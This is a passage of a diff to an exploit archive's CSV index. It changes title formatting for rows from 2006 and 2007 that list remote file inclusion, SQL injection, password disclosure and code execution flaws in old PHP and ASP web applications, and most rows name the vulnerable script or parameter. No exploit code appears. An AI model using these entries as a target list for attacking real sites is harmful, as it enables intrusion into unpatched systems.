master",php,webapps,0 -2948,platforms/php/webapps/2948.txt,"RateMe 1.3.2 - (main.inc.php) Remote File Inclusion",2006-12-18,"Al7ejaz Hacker",php,webapps,0 +2948,platforms/php/webapps/2948.txt,"RateMe 1.3.2 - 'main.inc.php' Remote File Inclusion",2006-12-18,"Al7ejaz Hacker",php,webapps,0 2953,platforms/php/webapps/2953.php,"PHP-Update 2.7 - extract() Authentication Bypass / Shell Inject Exploit",2006-12-19,rgod,php,webapps,0 -2955,platforms/php/webapps/2955.txt,"Paristemi 0.8.3b - (buycd.php) Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0 +2955,platforms/php/webapps/2955.txt,"Paristemi 0.8.3b - 'buycd.php' Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0 2956,platforms/php/webapps/2956.txt,"phpProfiles 3.1.2b - Multiple Remote File Inclusion",2006-12-19,nuffsaid,php,webapps,0 2957,platforms/php/webapps/2957.txt,"PHPFanBase 2.x - 'protection.php' Remote File Inclusion",2006-12-19,"Cold Zero",php,webapps,0 -2958,platforms/php/webapps/2958.txt,"cwmVote 1.0 - (archive.php) Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0 -2960,platforms/php/webapps/2960.pl,"cwmCounter 5.1.1 - (statistic.php) Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0 +2958,platforms/php/webapps/2958.txt,"cwmVote 1.0 - 'archive.php' Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0 +2960,platforms/php/webapps/2960.pl,"cwmCounter 5.1.1 - 'statistic.php' Remote File Inclusion",2006-12-19,bd0rk,php,webapps,0 2962,platforms/asp/webapps/2962.txt,"Burak Yilmaz Download Portal - 'down.asp' SQL Injection",2006-12-19,ShaFuck31,asp,webapps,0 2963,platforms/asp/webapps/2963.txt,"cwmExplorer 1.0 - (show_file) Source Code Disclosure",2006-12-19,ajann,asp,webapps,0 2964,platforms/php/webapps/2964.txt,"Valdersoft Shopping Cart 3.0 - Multiple Remote File Inclusion",2006-12-20,mdx,php,webapps,0 -2965,platforms/php/webapps/2965.txt,"TextSend 1.5 - (config/sender.php) Remote File Inclusion",2006-12-20,nuffsaid,php,webapps,0 +2965,platforms/php/webapps/2965.txt,"TextSend 1.5 - 'config/sender.php' Remote File Inclusion",2006-12-20,nuffsaid,php,webapps,0 2968,platforms/php/webapps/2968.php,"PHP Advanced Transfer Manager 1.30 - Source Code Disclosure",2006-12-20,Kacper,php,webapps,0 -2969,platforms/php/webapps/2969.txt,"PHP/Mysql Site Builder 0.0.2 - (htm2PHP.php) File Disclosure",2006-12-21,"the master",php,webapps,0 -2970,platforms/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - (mapage.php) Remote File Inclusion",2006-12-21,3l3ctric-Cracker,php,webapps,0 +2969,platforms/php/webapps/2969.txt,"PHP/Mysql Site Builder 0.0.2 - 'htm2PHP.php' File Disclosure",2006-12-21,"the master",php,webapps,0 +2970,platforms/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - 'mapage.php' Remote File Inclusion",2006-12-21,3l3ctric-Cracker,php,webapps,0 2971,platforms/php/webapps/2971.txt,"PgmReloaded 0.8.5 - Multiple Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0 2973,platforms/php/webapps/2973.txt,"PowerClan 1.14a - 'footer.inc.php' Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0 2975,platforms/php/webapps/2975.pl,"Ixprim CMS 1.2 - Blind SQL Injection",2006-12-21,DarkFig,php,webapps,0 -2976,platforms/php/webapps/2976.txt,"inertianews 0.02b - (inertianews_main.php) Remote File Inclusion",2006-12-21,bd0rk,php,webapps,0 +2976,platforms/php/webapps/2976.txt,"inertianews 0.02b - 'inertianews_main.php' Remote File Inclusion",2006-12-21,bd0rk,php,webapps,0 2977,platforms/php/webapps/2977.txt,"MKPortal M1.1.1 - 'Urlobox' Cross-Site Request Forgery",2006-12-21,Demential,php,webapps,0 2979,platforms/php/webapps/2979.txt,"KISGB 5.1.1 - 'Authenticate.php' Remote File Inclusion",2006-12-22,mdx,php,webapps,0 -2980,platforms/php/webapps/2980.txt,"EternalMart Guestbook 1.10 - (admin/auth.php) Remote File Inclusion",2006-12-22,mdx,php,webapps,0 +2980,platforms/php/webapps/2980.txt,"EternalMart Guestbook 1.10 - 'admin/auth.php' Remote File Inclusion",2006-12-22,mdx,php,webapps,0 2981,platforms/php/webapps/2981.php,"open NewsLetter 2.5 - Multiple Vulnerabilities (2)",2006-12-23,BlackHawk,php,webapps,0 2982,platforms/php/webapps/2982.txt,"3editor CMS 0.42 - 'index.php' Local File Inclusion",2006-12-22,3l3ctric-Cracker,php,webapps,0 -2983,platforms/php/webapps/2983.txt,"b2 Blog 0.5 - (b2verifauth.php) Remote File Inclusion",2006-12-23,mdx,php,webapps,0 +2983,platforms/php/webapps/2983.txt,"b2 Blog 0.5 - 'b2verifauth.php' Remote File Inclusion",2006-12-23,mdx,php,webapps,0 2984,platforms/php/webapps/2984.txt,"SH-News 0.93 - 'misc.php' Remote File Inclusion",2006-12-23,bd0rk,php,webapps,0 -2986,platforms/asp/webapps/2986.txt,"Enthrallweb ePhotos 1.0 - (subLevel2.asp) SQL Injection",2006-12-23,ajann,asp,webapps,0 +2986,platforms/asp/webapps/2986.txt,"Enthrallweb ePhotos 1.0 - 'subLevel2.asp' SQL Injection",2006-12-23,ajann,asp,webapps,0 2987,platforms/asp/webapps/2987.txt,"Enthrallweb eHomes 1.0 - Multiple (SQL Injection / Cross-Site Scripting) Vulnerabilities",2006-12-23,ajann,asp,webapps,0 2988,platforms/asp/webapps/2988.pl,"Enthrallweb eJobs - 'newsdetail.asp' SQL Injection",2006-12-23,ajann,asp,webapps,0 -2989,platforms/asp/webapps/2989.txt,"Enthrallweb eCars 1.0 - (types.asp) SQL Injection",2006-12-23,ajann,asp,webapps,0 -2990,platforms/asp/webapps/2990.pl,"Enthrallweb emates 1.0 - (newsdetail.asp) SQL Injection",2006-12-23,ajann,asp,webapps,0 +2989,platforms/asp/webapps/2989.txt,"Enthrallweb eCars 1.0 - 'types.asp' SQL Injection",2006-12-23,ajann,asp,webapps,0 +2990,platforms/asp/webapps/2990.pl,"Enthrallweb emates 1.0 - 'newsdetail.asp' SQL Injection",2006-12-23,ajann,asp,webapps,0 2991,platforms/asp/webapps/2991.pl,"Enthrallweb ePages - 'actualpic.asp' SQL Injection",2006-12-23,ajann,asp,webapps,0 2992,platforms/asp/webapps/2992.txt,"Dragon Business Directory 3.01.12 - 'ID' SQL Injection",2006-12-23,ajann,asp,webapps,0 2993,platforms/asp/webapps/2993.txt,"Calendar MX BASIC 1.0.2 - 'ID' SQL Injection",2006-12-23,ajann,asp,webapps,0 2994,platforms/asp/webapps/2994.htm,"Enthrallweb eClassifieds 1.0 - Remote User Pass Change Exploit",2006-12-23,ajann,asp,webapps,0 -2995,platforms/asp/webapps/2995.htm,"Enthrallweb eCoupons 1.0 - (myprofile.asp) Remote Pass Change Exploit",2006-12-23,ajann,asp,webapps,0 +2995,platforms/asp/webapps/2995.htm,"Enthrallweb eCoupons 1.0 - 'myprofile.asp' Remote Pass Change Exploit",2006-12-23,ajann,asp,webapps,0 2996,platforms/asp/webapps/2996.htm,"Enthrallweb eNews 1.0 - Remote User Pass Change Exploit",2006-12-23,ajann,asp,webapps,0 -2997,platforms/asp/webapps/2997.pl,"File Upload Manager 1.0.6 - (detail.asp) SQL Injection",2006-12-24,ajann,asp,webapps,0 +2997,platforms/asp/webapps/2997.pl,"File Upload Manager 1.0.6 - 'detail.asp' SQL Injection",2006-12-24,ajann,asp,webapps,0 2998,platforms/asp/webapps/2998.pl,"NewsLetter MX 1.0.2 - 'ID' SQL Injection",2006-12-24,ajann,asp,webapps,0 -2999,platforms/php/webapps/2999.pl,"Ultimate PHP Board 2.0b1 - (chat/login.php) Code Execution",2006-12-24,nuffsaid,php,webapps,0 -3000,platforms/php/webapps/3000.pl,"Pagetool CMS 1.07 - (pt_upload.php) Remote File Inclusion",2006-12-24,g00ns,php,webapps,0 +2999,platforms/php/webapps/2999.pl,"Ultimate PHP Board 2.0b1 - 'chat/login.php' Code Execution",2006-12-24,nuffsaid,php,webapps,0 +3000,platforms/php/webapps/3000.pl,"Pagetool CMS 1.07 - 'pt_upload.php' Remote File Inclusion",2006-12-24,g00ns,php,webapps,0 3001,platforms/asp/webapps/3001.txt,"Ananda Real Estate 3.4 - (agent) SQL Injection",2006-12-24,ajann,asp,webapps,0 -3002,platforms/php/webapps/3002.php,"HLStats 1.34 - (hlstats.php) SQL Injection",2006-12-25,"Michael Brooks",php,webapps,0 +3002,platforms/php/webapps/3002.php,"HLStats 1.34 - 'hlstats.php' SQL Injection",2006-12-25,"Michael Brooks",php,webapps,0 3003,platforms/php/webapps/3003.txt,"Jinzora 2.7 - 'INCLUDE_PATH' Multiple Remote File Inclusion",2006-12-25,nuffsaid,php,webapps,0 -3004,platforms/php/webapps/3004.txt,"eNdonesia 8.4 - (mod.php/friend.php/admin.php) Multiple Vulnerabilities",2006-12-25,z1ckX(ru),php,webapps,0 -3005,platforms/php/webapps/3005.pl,"MTCMS 2.0 - (admin/admin_settings.php) Remote File Inclusion",2006-12-25,nuffsaid,php,webapps,0 +3004,platforms/php/webapps/3004.txt,"eNdonesia 8.4 - 'mod.php/friend.php/admin.php' Multiple Vulnerabilities",2006-12-25,z1ckX(ru),php,webapps,0 +3005,platforms/php/webapps/3005.pl,"MTCMS 2.0 - 'admin/admin_settings.php' Remote File Inclusion",2006-12-25,nuffsaid,php,webapps,0 3006,platforms/php/webapps/3006.txt,"PhpbbXtra 2.0 - 'phpbb_root_path' Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 3007,platforms/php/webapps/3007.txt,"Irokez Blog 0.7.1 - Multiple Remote File Inclusion",2006-12-25,nuffsaid,php,webapps,0 3008,platforms/php/webapps/3008.pl,"Ciberia Content Federator 1.0.1 - (path) Remote File Inclusion",2006-12-25,DeltahackingTEAM,php,webapps,0 3009,platforms/php/webapps/3009.txt,"Shadowed Portal Module Character Roster - (mod_root) Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 3010,platforms/php/webapps/3010.txt,"myPHPNuke Module My_eGallery 2.5.6 - 'basepath' Parameter Remote File Inclusion",2006-12-25,"Mehmet Ince",php,webapps,0 3011,platforms/php/webapps/3011.pl,"Fishyshoop 0.930b - Remote Add Administrator Account Exploit",2006-12-25,"James Gray",php,webapps,0 -3012,platforms/php/webapps/3012.txt,"Okul Merkezi Portal 1.0 - (ataturk.php) Remote File Inclusion",2006-12-25,ShaFuck31,php,webapps,0 +3012,platforms/php/webapps/3012.txt,"Okul Merkezi Portal 1.0 - 'ataturk.php' Remote File Inclusion",2006-12-25,ShaFuck31,php,webapps,0 3014,platforms/php/webapps/3014.txt,"logahead UNU edition 1.0 - Arbitrary File Upload / Code Execution",2006-12-25,CorryL,php,webapps,0 3015,platforms/asp/webapps/3015.pl,"The Classified Ad System 1.0 - (main) SQL Injection",2006-12-26,ajann,asp,webapps,0 3016,platforms/php/webapps/3016.php,"Cahier de texte 2.2 - Bypass General Access Protection Exploit",2006-12-26,DarkFig,php,webapps,0 3017,platforms/php/webapps/3017.php,"PHP-Update 2.7 - Multiple Vulnerabilities",2006-12-26,rgod,php,webapps,0 3018,platforms/php/webapps/3018.txt,"mxBB Module pafiledb 2.0.1b - Remote File Inclusion",2006-12-26,bd0rk,php,webapps,0 3019,platforms/php/webapps/3019.txt,"myPHPCalendar 10192000b - (cal_dir) Remote File Inclusion",2006-12-26,Cr@zy_King,php,webapps,0 -3020,platforms/php/webapps/3020.pl,"PHP-Update 2.7 - (admin/uploads.php) Remote Code Execution",2006-12-26,undefined1_,php,webapps,0 -3025,platforms/php/webapps/3025.pl,"Yrch 1.0 - (plug.inc.php path Variable) Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 -3026,platforms/php/webapps/3026.txt,"Bubla 1.0.0rc2 - (bu/process.php) Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 +3020,platforms/php/webapps/3020.pl,"PHP-Update 2.7 - 'admin/uploads.php' Remote Code Execution",2006-12-26,undefined1_,php,webapps,0 +3025,platforms/php/webapps/3025.pl,"Yrch 1.0 - 'plug.inc.php path Variable' Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 +3026,platforms/php/webapps/3026.txt,"Bubla 1.0.0rc2 - 'bu/process.php' Remote File Inclusion",2006-12-27,DeltahackingTEAM,php,webapps,0 3027,platforms/php/webapps/3027.txt,"Fantastic News 2.1.4 - Multiple Remote File Inclusion",2006-12-27,Mr-m07,php,webapps,0 3028,platforms/php/webapps/3028.txt,"Limbo CMS Module event 1.0 - Remote File Inclusion",2006-12-27,"Mehmet Ince",php,webapps,0 3029,platforms/php/webapps/3029.php,"Cacti 0.8.6i - cmd.php popen() Remote Injection",2006-12-27,rgod,php,webapps,0 -3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 - (faqDsp.asp catcode) SQL Injection",2006-12-28,ajann,asp,webapps,0 +3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 - 'faqDsp.asp catcode' SQL Injection",2006-12-28,ajann,asp,webapps,0 3032,platforms/asp/webapps/3032.txt,"wywo inout board 1.0 - Multiple Vulnerabilities",2006-12-28,ajann,asp,webapps,0 3033,platforms/php/webapps/3033.txt,"phpBB2 Plus 1.53 - (Acronym Mod) SQL Injection",2006-12-28,"the master",php,webapps,0 3035,platforms/asp/webapps/3035.txt,"ASPTicker 1.0 - Authentication Bypass",2006-12-28,ajann,asp,webapps,0 3036,platforms/php/webapps/3036.php,"WebText 0.4.5.2 - Remote Code Execution",2006-12-28,Kacper,php,webapps,0 3039,platforms/php/webapps/3039.txt,"EasyNews PRO News Publishing 4.0 - Password Disclosure",2006-12-29,bd0rk,php,webapps,0 -3043,platforms/php/webapps/3043.txt,"x-news 1.1 - (users.txt) Remote Password Disclosure",2006-12-30,bd0rk,php,webapps,0 -3044,platforms/php/webapps/3044.txt,"Voodoo chat 1.0RC1b - (users.dat) Password Disclosure",2006-12-30,bd0rk,php,webapps,0 +3043,platforms/php/webapps/3043.txt,"x-news 1.1 - 'users.txt' Remote Password Disclosure",2006-12-30,bd0rk,php,webapps,0 +3044,platforms/php/webapps/3044.txt,"Voodoo chat 1.0RC1b - 'users.dat' Password Disclosure",2006-12-30,bd0rk,php,webapps,0 3045,platforms/php/webapps/3045.php,"Cacti 0.8.6i - 'copy_cacti_user.php' SQL Injection Create Admin Exploit",2006-12-30,rgod,php,webapps,0 -3046,platforms/asp/webapps/3046.txt,"SoftArtisans SAFileUp 5.0.14 - (viewsrc.asp) Script Source Disclosure",2006-12-30,"Inge Henriksen",asp,webapps,0 -3047,platforms/php/webapps/3047.txt,"FreeStyle Wiki 3.6.2 - (user.dat) Password Disclosure",2006-12-30,bd0rk,php,webapps,0 +3046,platforms/asp/webapps/3046.txt,"SoftArtisans SAFileUp 5.0.14 - 'viewsrc.asp' Script Source Disclosure",2006-12-30,"Inge Henriksen",asp,webapps,0 +3047,platforms/php/webapps/3047.txt,"FreeStyle Wiki 3.6.2 - 'user.dat' Password Disclosure",2006-12-30,bd0rk,php,webapps,0 3048,platforms/asp/webapps/3048.pl,"Click N Print Coupons 2006.01 - (key) SQL Injection",2006-12-30,ajann,asp,webapps,0 3049,platforms/php/webapps/3049.php,"IMGallery 2.5 - Create Uploader Script Exploit",2006-12-30,Kacper,php,webapps,0 3050,platforms/php/webapps/3050.txt,"Enigma 2 Coppermine Bridge - (boarddir) Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps,0 3051,platforms/php/webapps/3051.txt,"WordPress Plugin Enigma 2 Bridge - (boarddir) Remote File Inclusion",2006-12-30,"Mehmet Ince",php,webapps,0 3053,platforms/php/webapps/3053.txt,"Vz (Adp) Forum 2.0.3 - Remote Password Disclosure",2006-12-31,3l3ctric-Cracker,php,webapps,0 -3054,platforms/php/webapps/3054.txt,"P-News 1.16 / 1.17 - (user.dat) Remote Password Disclosure",2006-12-31,3l3ctric-Cracker,php,webapps,0 +3054,platforms/php/webapps/3054.txt,"P-News 1.16 / 1.17 - 'user.dat' Remote Password Disclosure",2006-12-31,3l3ctric-Cracker,php,webapps,0 3057,platforms/php/webapps/3057.php,"MDForum 2.0.1 - (PNSVlang) Remote Code Execution",2006-12-31,Kacper,php,webapps,0 3059,platforms/php/webapps/3059.txt,"Bubla 0.9.2 - (bu_dir) Multiple Remote File Inclusion",2006-12-31,DeltahackingTEAM,php,webapps,0 -3060,platforms/asp/webapps/3060.txt,"RBlog 1.0 - (admin.mdb) Remote Password Disclosure",2007-01-01,"Aria-Security Team",asp,webapps,0 +3060,platforms/asp/webapps/3060.txt,"RBlog 1.0 - 'admin.mdb' Remote Password Disclosure",2007-01-01,"Aria-Security Team",asp,webapps,0 3061,platforms/asp/webapps/3061.txt,"Vizayn Haber - 'haberdetay.asp id Variable' SQL Injection",2007-01-01,chernobiLe,asp,webapps,0 -3062,platforms/asp/webapps/3062.txt,"AutoDealer 2.0 - (detail.asp iPro) SQL Injection",2007-01-01,ajann,asp,webapps,0 -3065,platforms/cgi/webapps/3065.txt,"WWWBoard 2.0 - (passwd.txt) Remote Password Disclosure",2007-01-01,bd0rk,cgi,webapps,0 +3062,platforms/asp/webapps/3062.txt,"AutoDealer 2.0 - 'detail.asp iPro' SQL Injection",2007-01-01,ajann,asp,webapps,0 +3065,platforms/cgi/webapps/3065.txt,"WWWBoard 2.0 - 'passwd.txt' Remote Password Disclosure",2007-01-01,bd0rk,cgi,webapps,0 3066,platforms/asp/webapps/3066.txt,"NewsCMSLite - 'newsCMS.mdb' Remote Password Disclosure",2007-01-01,KaBuS,asp,webapps,0 -3068,platforms/asp/webapps/3068.htm,"TaskTracker 1.5 - (Customize.asp) Remote Add Administrator Exploit",2007-01-01,ajann,asp,webapps,0 +3068,platforms/asp/webapps/3068.htm,"TaskTracker 1.5 - 'Customize.asp' Remote Add Administrator Exploit",2007-01-01,ajann,asp,webapps,0 3073,platforms/asp/webapps/3073.txt,"LocazoList 2.01a beta5 - (subcatID) SQL Injection",2007-01-03,ajann,asp,webapps,0 3074,platforms/asp/webapps/3074.txt,"E-Smart Cart 1.0 - 'Product_ID' Parameter SQL Injection",2007-01-03,ajann,asp,webapps,0 -3075,platforms/php/webapps/3075.pl,"VerliAdmin 0.3 - (language.php) Local File Inclusion",2007-01-03,Kw3[R]Ln,php,webapps,0 +3075,platforms/php/webapps/3075.pl,"VerliAdmin 0.3 - 'language.php' Local File Inclusion",2007-01-03,Kw3[R]Ln,php,webapps,0 3076,platforms/php/webapps/3076.php,"Simple Web Content Management System - SQL Injection",2007-01-03,DarkFig,php,webapps,0 -3079,platforms/php/webapps/3079.txt,"Aratix 0.2.2b11 - (inc/init.inc.php) Remote File Inclusion",2007-01-04,nuffsaid,php,webapps,0 +3079,platforms/php/webapps/3079.txt,"Aratix 0.2.2b11 - 'inc/init.inc.php' Remote File Inclusion",2007-01-04,nuffsaid,php,webapps,0 3081,platforms/asp/webapps/3081.pl,"DigiRez 3.4 - (book_id) SQL Injection",2007-01-04,ajann,asp,webapps,0 -3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - (user.php id Variable) SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 +3082,platforms/php/webapps/3082.txt,"iG Calendar 1.0 - 'user.php id Variable' SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 3083,platforms/php/webapps/3083.txt,"ig shop 1.0 - Code Execution / SQL Injection",2007-01-05,"Michael Brooks",php,webapps,0 3085,platforms/php/webapps/3085.php,"Coppermine Photo Gallery 1.4.10 - 'xpl.php' SQL Injection",2007-01-05,DarkFig,php,webapps,0 3089,platforms/asp/webapps/3089.txt,"QUOTE&ORDERING SYSTEM 1.0 - 'ordernum' Multiple Vulnerabilities",2007-01-05,ajann,asp,webapps,0 @@ -17203,68 +17206,68 @@ id,file,description,date,author,platform,type,port 3114,platforms/php/webapps/3114.txt,"Article System 0.1 - (INCLUDE_DIR) Remote File Inclusion",2007-01-11,3l3ctric-Cracker,php,webapps,0 3115,platforms/asp/webapps/3115.txt,"vp-asp shopping cart 6.09 - SQL Injection / Cross-Site Scripting",2007-01-11,ajann,asp,webapps,0 3116,platforms/php/webapps/3116.php,"sNews 1.5.30 - Remote Reset Admin Pass / Command Execution",2007-01-12,rgod,php,webapps,0 -3117,platforms/php/webapps/3117.txt,"LunarPoll 1.0 - (show.php PollDir) Remote File Inclusion",2007-01-12,"ilker Kandemir",php,webapps,0 -3118,platforms/php/webapps/3118.txt,"TLM CMS 1.1 - (i-accueil.php chemin) Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0 -3120,platforms/php/webapps/3120.txt,"Mint Haber Sistemi 2.7 - (duyuru.asp id) SQL Injection",2007-01-12,chernobiLe,php,webapps,0 +3117,platforms/php/webapps/3117.txt,"LunarPoll 1.0 - 'show.php PollDir' Remote File Inclusion",2007-01-12,"ilker Kandemir",php,webapps,0 +3118,platforms/php/webapps/3118.txt,"TLM CMS 1.1 - 'i-accueil.php chemin' Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0 +3120,platforms/php/webapps/3120.txt,"Mint Haber Sistemi 2.7 - 'duyuru.asp id' SQL Injection",2007-01-12,chernobiLe,php,webapps,0 3121,platforms/php/webapps/3121.txt,"Poplar Gedcom Viewer 2.0 - 'common.php' Remote File Inclusion",2007-01-12,GoLd_M,php,webapps,0 3122,platforms/asp/webapps/3122.pl,"DigiAffiliate 1.4 - 'id' Parameter SQL Injection",2007-01-13,ajann,asp,webapps,0 3123,platforms/php/webapps/3123.htm,"FdWeB Espace Membre 2.01 - (path) Remote File Inclusion",2007-01-13,ajann,php,webapps,0 3124,platforms/php/webapps/3124.php,"ThWboard 3.0b2.84-php5 - SQL Injection / Code Execution",2007-01-14,rgod,php,webapps,0 3125,platforms/php/webapps/3125.c,"JV2 Folder Gallery 3.0 - 'download.php' Remote File Disclosure",2007-01-14,PeTrO,php,webapps,0 -3134,platforms/php/webapps/3134.php,"KGB 1.9 - (sesskglogadmin.php) Local File Inclusion",2007-01-15,Kacper,php,webapps,0 +3134,platforms/php/webapps/3134.php,"KGB 1.9 - 'sesskglogadmin.php' Local File Inclusion",2007-01-15,Kacper,php,webapps,0 3135,platforms/asp/webapps/3135.txt,"Okul Web Otomasyon Sistemi 4.0.1 - SQL Injection",2007-01-15,"ilker Kandemir",asp,webapps,0 -3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 - (email.php id Variable) SQL Injection",2007-01-17,SlimTim10,php,webapps,0 +3141,platforms/php/webapps/3141.pl,"MGB 0.5.4.5 - 'email.php id Variable' SQL Injection",2007-01-17,SlimTim10,php,webapps,0 3143,platforms/php/webapps/3143.php,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (1)",2007-01-17,"silent vapor",php,webapps,0 3144,platforms/php/webapps/3144.pl,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (2)",2007-01-17,trew,php,webapps,0 -3145,platforms/php/webapps/3145.txt,"PHPMyphorum 1.5a - (mep/frame.php) Remote File Inclusion",2007-01-17,v1per-haCker,php,webapps,0 +3145,platforms/php/webapps/3145.txt,"PHPMyphorum 1.5a - 'mep/frame.php' Remote File Inclusion",2007-01-17,v1per-haCker,php,webapps,0 3146,platforms/php/webapps/3146.pl,"Woltlab Burning Board 1.0.2 / 2.3.6 - search.php SQL Injection (3)",2007-01-17,666,php,webapps,0 3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 - 'FrontPage.php' Remote File Inclusion",2007-01-17,GoLd_M,php,webapps,0 -3150,platforms/php/webapps/3150.txt,"Oreon 1.2.3 RC4 - (lang/index.php) Remote File Inclusion",2007-01-17,3l3ctric-Cracker,php,webapps,0 -3152,platforms/php/webapps/3152.txt,"ComVironment 4.0 - (grab_globals.lib.php) Remote File Inclusion",2007-01-18,GoLd_M,php,webapps,0 +3150,platforms/php/webapps/3150.txt,"Oreon 1.2.3 RC4 - 'lang/index.php' Remote File Inclusion",2007-01-17,3l3ctric-Cracker,php,webapps,0 +3152,platforms/php/webapps/3152.txt,"ComVironment 4.0 - 'grab_globals.lib.php' Remote File Inclusion",2007-01-18,GoLd_M,php,webapps,0 3153,platforms/php/webapps/3153.php,"phpBP RC3 (2.204) - SQL Injection / Remote Code Execution",2007-01-18,Kacper,php,webapps,0 -3161,platforms/php/webapps/3161.txt,"PHPSherpa - (include/config.inc.php) Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 -3162,platforms/php/webapps/3162.txt,"Bradabra 2.0.5 - (include/includes.php) Remote File Inclusion",2007-01-20,GoLd_M,php,webapps,0 -3163,platforms/php/webapps/3163.txt,"Neon Labs Website 3.2 - (nl.php g_strRootDir) Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 +3161,platforms/php/webapps/3161.txt,"PHPSherpa - 'include/config.inc.php' Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 +3162,platforms/php/webapps/3162.txt,"Bradabra 2.0.5 - 'include/includes.php' Remote File Inclusion",2007-01-20,GoLd_M,php,webapps,0 +3163,platforms/php/webapps/3163.txt,"Neon Labs Website 3.2 - 'nl.php g_strRootDir' Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 3164,platforms/php/webapps/3164.pl,"PHPIndexPage 1.0.1 - 'config.php' Remote File Inclusion",2007-01-20,DeltahackingTEAM,php,webapps,0 -3165,platforms/php/webapps/3165.txt,"MySpeach 2.1b - (up.php) Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 -3169,platforms/php/webapps/3169.txt,"WebChat 0.77 - (defines.php WEBCHATPATH) Remote File Inclusion",2007-01-21,v1per-haCker,php,webapps,0 -3171,platforms/php/webapps/3171.pl,"Mafia Scum Tools 2.0.0 - (index.php gen) Remote File Inclusion",2007-01-21,DeltahackingTEAM,php,webapps,0 +3165,platforms/php/webapps/3165.txt,"MySpeach 2.1b - 'up.php' Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 +3169,platforms/php/webapps/3169.txt,"WebChat 0.77 - 'defines.php WEBCHATPATH' Remote File Inclusion",2007-01-21,v1per-haCker,php,webapps,0 +3171,platforms/php/webapps/3171.pl,"Mafia Scum Tools 2.0.0 - 'index.php gen' Remote File Inclusion",2007-01-21,DeltahackingTEAM,php,webapps,0 3172,platforms/php/webapps/3172.php,"webSPELL 4.01.02 - 'gallery.php' Blind SQL Injection",2007-01-21,r00t,php,webapps,0 -3174,platforms/php/webapps/3174.txt,"Upload Service 1.0 - (top.php maindir) Remote File Inclusion",2007-01-21,y3dips,php,webapps,0 +3174,platforms/php/webapps/3174.txt,"Upload Service 1.0 - 'top.php maindir' Remote File Inclusion",2007-01-21,y3dips,php,webapps,0 3175,platforms/php/webapps/3175.pl,"VisoHotlink 1.01 - functions.visohotlink.php Remote File Inclusion",2007-01-22,bd0rk,php,webapps,0 -3180,platforms/php/webapps/3180.pl,"Vote-Pro 4.0 - (poll_frame.php poll_id) Remote Code Execution",2007-01-23,r0ut3r,php,webapps,0 -3183,platforms/php/webapps/3183.txt,"BBClone 0.31 - (selectlang.php) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 +3180,platforms/php/webapps/3180.pl,"Vote-Pro 4.0 - 'poll_frame.php poll_id' Remote Code Execution",2007-01-23,r0ut3r,php,webapps,0 +3183,platforms/php/webapps/3183.txt,"BBClone 0.31 - 'selectlang.php' Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 3184,platforms/php/webapps/3184.txt,"phpXD 0.3 - (path) Remote File Inclusion",2007-01-23,3l3ctric-Cracker,php,webapps,0 -3185,platforms/php/webapps/3185.txt,"RPW 1.0.2 - (config.php sql_language) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0 -3186,platforms/asp/webapps/3186.txt,"ASP EDGE 1.2b - (user.asp) SQL Injection",2007-01-24,ajann,asp,webapps,0 -3187,platforms/asp/webapps/3187.txt,"ASP NEWS 3.0 - (news_detail.asp) SQL Injection",2007-01-24,ajann,asp,webapps,0 +3185,platforms/php/webapps/3185.txt,"RPW 1.0.2 - 'config.php sql_language' Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0 +3186,platforms/asp/webapps/3186.txt,"ASP EDGE 1.2b - 'user.asp' SQL Injection",2007-01-24,ajann,asp,webapps,0 +3187,platforms/asp/webapps/3187.txt,"ASP NEWS 3.0 - 'news_detail.asp' SQL Injection",2007-01-24,ajann,asp,webapps,0 3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 - (MODULES_DIR) Remote File Inclusion",2007-01-24,3l3ctric-Cracker,php,webapps,0 3192,platforms/php/webapps/3192.pl,"Xero Portal - 'phpbb_root_path' Remote File Inclusion",2007-01-24,"Mehmet Ince",php,webapps,0 3194,platforms/asp/webapps/3194.txt,"makit Newsposter Script 3.0 - SQL Injection",2007-01-25,ajann,asp,webapps,0 -3195,platforms/asp/webapps/3195.txt,"GPS CMS 1.2 - (print.asp) SQL Injection",2007-01-25,ajann,asp,webapps,0 +3195,platforms/asp/webapps/3195.txt,"GPS CMS 1.2 - 'print.asp' SQL Injection",2007-01-25,ajann,asp,webapps,0 3196,platforms/php/webapps/3196.php,"Aztek Forum 4.0 - Multiple Vulnerabilities",2007-01-25,DarkFig,php,webapps,0 3197,platforms/asp/webapps/3197.txt,"forum livre 1.0 - SQL Injection / Cross-Site Scripting",2007-01-25,ajann,asp,webapps,0 -3198,platforms/php/webapps/3198.txt,"Virtual 